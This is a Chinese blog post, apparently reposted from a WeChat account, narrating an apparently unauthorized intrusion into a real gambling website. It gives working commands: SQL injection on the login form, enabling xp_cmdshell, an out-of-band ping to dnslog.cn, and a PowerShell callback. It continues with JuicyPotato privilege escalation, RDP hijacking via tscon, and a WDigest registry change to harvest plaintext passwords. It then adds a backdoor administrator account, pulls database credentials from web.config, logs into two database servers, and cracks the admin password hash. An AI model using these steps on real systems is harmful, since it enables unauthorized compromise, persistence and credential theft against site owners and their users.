某棋牌站点的简单渗透

渗透技巧 1年前 (2023) admin
286 0 0

前言:

前几天无意看到了某个师傅的博客,就看到了某棋牌站点的sql注入,于是花了几分钟打了一下,也就当第一次打这种站点,过程非常简单,最后也是获取到了数据库密码,网站后台密码。

sql注入:

该站点如果有师傅打过,肯定有感觉的。

某棋牌站点的简单渗透
image-20230307011024076

登录框这里存在sql注入,sqlmap跑一下。

某棋牌站点的简单渗透
image-20230307011228661

但是这里只是一个延时注入,是dba权限

某棋牌站点的简单渗透
image-20230307011329862

这里就不执行os-shell了,太慢了,直接利用xp_cmdshell执行命令

xp_cmdshell上线:

开启xp_cmdshell:

admin';EXEC sp_configure 'show advanced options',1;RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;--

执行命令判断出网:

admin';exec master..xp_cmdshell 'ping dnslog.cn' --&password=123
某棋牌站点的简单渗透
image-20230307130322029

就直接上线就行了:

这里如果用powershell一句话上线要注意转义,我最开始是执行下载木马命令然后在上线的,发现不能执行,因为权限比较低。

某棋牌站点的简单渗透
image-20230307011921504

就是一个server权限,最后执行powershell语句上线的

某棋牌站点的简单渗透
image-20230307012000026
某棋牌站点的简单渗透
image-20230307012032992

内网渗透:

提权:

权限比较低,烂土豆一把梭

某棋牌站点的简单渗透
image-20230307012122372

抓密码:

接着抓密码,显然是抓不到明文的,

某棋牌站点的简单渗透
image-20230307012241720

这里简单讲一下常用的方法来获取管理员桌面:

RDP劫持:

这里我最开始想的是rdp劫持登录administrator的,发现管理员不在线

shell quser
某棋牌站点的简单渗透
image-20230307012352699

如果管理员在线,利用sysytem执行:

tscon ID

然后接可以获取到管理员桌面了。

修改注册表:

这里我们可以修改注册表,然后进行锁屏,这样管理员在登陆的时候就可以抓到明文密码了:

##修改注册表:
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /UseLogonCredential /t REG_DWORD /1 /f

锁屏主机:
rundll32.exe user32.dll,LockWorkStation

这里由于管理员不在线,所以就不演示了,可以本地复现一遍。

RDP hash传递:

这个方法我一直没有成功过,本地复现也失败,这里有兴趣的师傅可以自行了解一下。

克隆用户:

在这里的话我直接创建一个用户,然后克隆一个administrator账号:

shell net user xxxx 123!@#qw /add
shell net localgroup administrators xxxx /add

利用xxxx账户登陆进去克隆administrator账户

在重新登陆就能看到administrator桌面了

某棋牌站点的简单渗透
image-20230307012709335

翻密码:

看到了mssql数据库正在运行:

某棋牌站点的简单渗透
image-20230307012805386

开始寻找数据库账号密码,因为网站是asp的,所以直接找web.config文件:

dir C:,D: //| find web.config""

收获挺大,翻到了两条数据库密码:

某棋牌站点的简单渗透
image-20230307013110178
某棋牌站点的简单渗透
image-20230307013222404

第一个是这个服务器的,第二个是另一个服务器的

这里就简单验证一下密码是否正确。

mssqlclient.exe "sa:password"@ip1
mssqlclient.exe "sa:password"@ip2
某棋牌站点的简单渗透
image-20230307013554375
某棋牌站点的简单渗透

后台登录:

在本地数据库找到了网站账号和加密后的密码,丢到md5解密:

某棋牌站点的简单渗透
image-20230307013718634
某棋牌站点的简单渗透
image-20230307013732751

这尼玛,直接123456

登陆后台

某棋牌站点的简单渗透
image-20230307132442164

靠,这个流量开个毛线呀。


原文始发于微信公众号(安全小子大杂烩):某棋牌站点的简单渗透

版权声明:admin 发表于 2023年3月7日 下午1:34。
转载请注明:某棋牌站点的简单渗透 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...